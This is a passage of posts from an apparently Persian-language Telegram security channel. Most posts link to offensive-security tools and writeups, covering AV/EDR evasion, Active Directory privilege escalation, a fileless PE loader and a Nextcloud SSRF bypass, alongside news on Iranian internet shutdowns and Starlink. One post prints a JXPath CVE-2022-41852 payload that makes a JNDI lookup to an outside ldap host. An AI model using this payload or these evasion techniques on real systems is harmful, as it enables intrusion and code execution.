⭕️ تکنیک ها و ابزار های زیادی در حوزه دور زدن av و edr و xdr ها وجود داره.
در ابزار مفیدی مثل incpector به قسمت های مختلفی پرداخته میشه
مثل:
انواع روش لود کردن shellcode ها (sRDI ,Pe2shو..)
انواع روش های loader-independent encoding, and loader-dependent
(native: Xor,Nop. .net: Hex,base64.)
انواع روش های دور زدن مکانیزم آنتی ویروس
(amsi bypass. wldp bypass . etw bypass)
انواع روش های دور زدن مکانیزم های edr ها
(full unhooking. manual dll mapping . direct syscalls)
تکنیک های مبهم سازی کد در powershell - C# c و ++C
و در اخر بحث code signing با certificates های ماکروسافتی
نتیجه گیری که میشه کرد این ابزار یه دید خوبی نسبت به ساختار آنتی ویروس ها و edr ها و روش های دور زدنشون به صورت پلکانی و مرحله به مرحله رو به ما اختصاص میده
https://github.com/klezVirus/inceptor
https://raw.githubusercontent.com/klezVirus/inceptor/main/slides/Inceptor%20-%20Bypass%20AV-EDR%20solutions%20combining%20well%20known%20techniques.pdf
#avbypass #redteam #edr #av
@securation
در ابزار مفیدی مثل incpector به قسمت های مختلفی پرداخته میشه
مثل:
انواع روش لود کردن shellcode ها (sRDI ,Pe2shو..)
انواع روش های loader-independent encoding, and loader-dependent
(native: Xor,Nop. .net: Hex,base64.)
انواع روش های دور زدن مکانیزم آنتی ویروس
(amsi bypass. wldp bypass . etw bypass)
انواع روش های دور زدن مکانیزم های edr ها
(full unhooking. manual dll mapping . direct syscalls)
تکنیک های مبهم سازی کد در powershell - C# c و ++C
و در اخر بحث code signing با certificates های ماکروسافتی
نتیجه گیری که میشه کرد این ابزار یه دید خوبی نسبت به ساختار آنتی ویروس ها و edr ها و روش های دور زدنشون به صورت پلکانی و مرحله به مرحله رو به ما اختصاص میده
https://github.com/klezVirus/inceptor
https://raw.githubusercontent.com/klezVirus/inceptor/main/slides/Inceptor%20-%20Bypass%20AV-EDR%20solutions%20combining%20well%20known%20techniques.pdf
#avbypass #redteam #edr #av
@securation
GitHub
GitHub - klezVirus/inceptor: Template-Driven AV/EDR Evasion Framework
Template-Driven AV/EDR Evasion Framework. Contribute to klezVirus/inceptor development by creating an account on GitHub.
👍16👎3
⭕️Chaining bugs in Telegram for Android app to steal session-related files
https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd
#Telegram
@securation
https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd
#Telegram
@securation
Medium
Chaining Telegram bugs to steal session-related files.
We will discuss the chaining of two bugs on the telegram android application, which can make malicious applications steal internal telegram…
👍3👎1
⭕️ Finding bugs at limited scope programs (single domain)
در این مقاله به پیدا کردن آسیب پذیری در برنامه هایی با scope محدود پرداخته میشه.
https://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf
@securation
در این مقاله به پیدا کردن آسیب پذیری در برنامه هایی با scope محدود پرداخته میشه.
https://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf
@securation
Medium
Finding bugs at limited scope programs (Single Domain Websites)
Hi hunters, I am back with another write-up. Finding bugs in large scope is easy and its provide a large attack surface for hunters to…
🔥6👎3❤1
⭕️ GJoy Dex Analyzer (GDA)
https://github.com/charles2gan/GDA-android-reversing-Tool
#decompiler #android
@securation
https://github.com/charles2gan/GDA-android-reversing-Tool
#decompiler #android
@securation
👍4👎2
⭕️Autobloody
https://github.com/CravateRouge/autobloody
#ad #bloodhound
@securation
Automatically exploit Active Directory privilege escalation paths shown by BloodHound combining pathgen.py and autobloody.py.
Here is the list of the BloodHound edges currently supported for automatic exploitation:
MemberOf
ForceChangePassword
AddMembers
AddSelf
DCSync
GetChanges/GetChangesAll
GenericAll
WriteDacl
GenericWrite
WriteOwner
Owns
Contains
AllExtendedRightshttps://github.com/CravateRouge/autobloody
#ad #bloodhound
@securation
👍4👎1
Forwarded from NetBlocks
⚠️ Confirmed: Real-time network data show a near-total disruption to internet connectivity in #Sanandaj, the capital of Kurdistan Province in west #Iran; the incident comes amid widening protests over the death of #MahsaAmini after her arrest by morality police 📉
😢13❤1
⭕️awslabs-aws-security-assessment-solution
An AWS tool to help you create a point in time assessment of your AWS account using Prowler and Scout as well as optional AWS developed ransomware checks.
https://github.com/awslabs/aws-security-assessment-solution
#aws #security
@securation
An AWS tool to help you create a point in time assessment of your AWS account using Prowler and Scout as well as optional AWS developed ransomware checks.
https://github.com/awslabs/aws-security-assessment-solution
#aws #security
@securation
👍4👎1
⭕️ بعد از اعلام هکرهای Anonymous برای حمله سایبری در توییتر , حملات DDOS متعددی روی سرویس های دولتی راه انداخته و سرویس ها از دسترس خارج شده اند.
#ddos #anonymous #hackers
@securation
#ddos #anonymous #hackers
@securation
👍51👎11😁4❤3🔥3😢2🤩1
⭕️Fileless Remote PE
Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique
https://github.com/D1rkMtr/FilelessRemotePE
#evasion #fileless #PE
@securation
Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique
https://github.com/D1rkMtr/FilelessRemotePE
#evasion #fileless #PE
@securation
👍1
⭕️ SSRF filter bypass in Nextcloud
فیلتر SSRF اعمال شده اندپوینت و آدرس مربوط به Alibaba metadata و google cloud metadata رو چک نمیکنه.
https://hackerone.com/reports/1608039
#SSRF #Nexcloud
@securation
فیلتر SSRF اعمال شده اندپوینت و آدرس مربوط به Alibaba metadata و google cloud metadata رو چک نمیکنه.
https://hackerone.com/reports/1608039
#SSRF #Nexcloud
@securation
HackerOne
Nextcloud disclosed on HackerOne: SSRF via potential filter bypass...
Security advisory at https://github.com/nextcloud/security-advisories/security/advisories/GHSA-rmf9-w497-8cq8
❤5👍3
⭕️ اون زمانی که تهدید شدیم به اینکه :
اکانت ها و VPS های فیلترشکن هاتون رو کجای خونتون قایم کردی؟!
گفتیم توی CD/DVD بود شکستیم.
البته امروزه فیلترشکن که دیگه عادی تره تازه !
یه زمانی میومدن تهدید میکردن که هرکسی از پروتکل SSL برای سایت ها استفاده کنه مجرم هست.
میگفتیم مشکلش چیه وقتی داریم امنیت سرویس رو بالا میبریم؟
میگفتن :
ما نمیدونیم این پروتکل چیه ، ولی دشمن اینو طراحی کرده که اطلاعات رمزنگاری شده رد و بدل بشن!
بقیه اش خودتون متوجه شدین قطعا :)
@securation
اکانت ها و VPS های فیلترشکن هاتون رو کجای خونتون قایم کردی؟!
گفتیم توی CD/DVD بود شکستیم.
البته امروزه فیلترشکن که دیگه عادی تره تازه !
یه زمانی میومدن تهدید میکردن که هرکسی از پروتکل SSL برای سایت ها استفاده کنه مجرم هست.
میگفتیم مشکلش چیه وقتی داریم امنیت سرویس رو بالا میبریم؟
میگفتن :
ما نمیدونیم این پروتکل چیه ، ولی دشمن اینو طراحی کرده که اطلاعات رمزنگاری شده رد و بدل بشن!
بقیه اش خودتون متوجه شدین قطعا :)
@securation
👍61😁15👎3😢3❤1🤩1
⭕️ طبق گفته ی خبرگزاری CNN ، بایدن به آقا ایلان گفته که ازت حمایت میکنیم بابت اینترنت ماهواره ای که به مردم شریف ایران میدید.
گفته هزینه های این کار رو برای مردم کاهش میده و هرگونه حمایت نیاز باشه انجام میدیم.
حالا فعلا مشخص نیست چطور اینکارو میکنه و هزینه ها رو چطوری میخواد کاهش بده ، ولی خب نابغه ی مغروری مثل ایلان ماسک قطعا قدرت خودش رو به رخ استاد روح الله مومن نسب و تمام مُریدانِ این طرح امنیتی #صیانت و تمام خاک خورده های قرن دوم میلادی نشون میده.
https://edition.cnn.com/2022/10/21/politics/white-house-musk-starlink-iran-protests-ukraine/index.html
#صیانت #ایلان_ماسک
@securation
گفته هزینه های این کار رو برای مردم کاهش میده و هرگونه حمایت نیاز باشه انجام میدیم.
حالا فعلا مشخص نیست چطور اینکارو میکنه و هزینه ها رو چطوری میخواد کاهش بده ، ولی خب نابغه ی مغروری مثل ایلان ماسک قطعا قدرت خودش رو به رخ استاد روح الله مومن نسب و تمام مُریدانِ این طرح امنیتی #صیانت و تمام خاک خورده های قرن دوم میلادی نشون میده.
https://edition.cnn.com/2022/10/21/politics/white-house-musk-starlink-iran-protests-ukraine/index.html
#صیانت #ایلان_ماسک
@securation
CNN
CNN Exclusive: After Ukraine, Biden administration turns to Musk’s satellite internet for Iran | CNN Politics
The White House has engaged in talks with Elon Musk about the possibility of setting up SpaceX’s satellite internet service Starlink inside Iran, multiple officials familiar with the discussions told CNN.
👍28👎10❤4🤩2😁1
⭕️Apache Commons Jxpath (
Payload:
https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #jxpath #exploit
@securation
CVE-2022-41852)Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #jxpath #exploit
@securation
👍4
❤14👎9👍6😢2😁1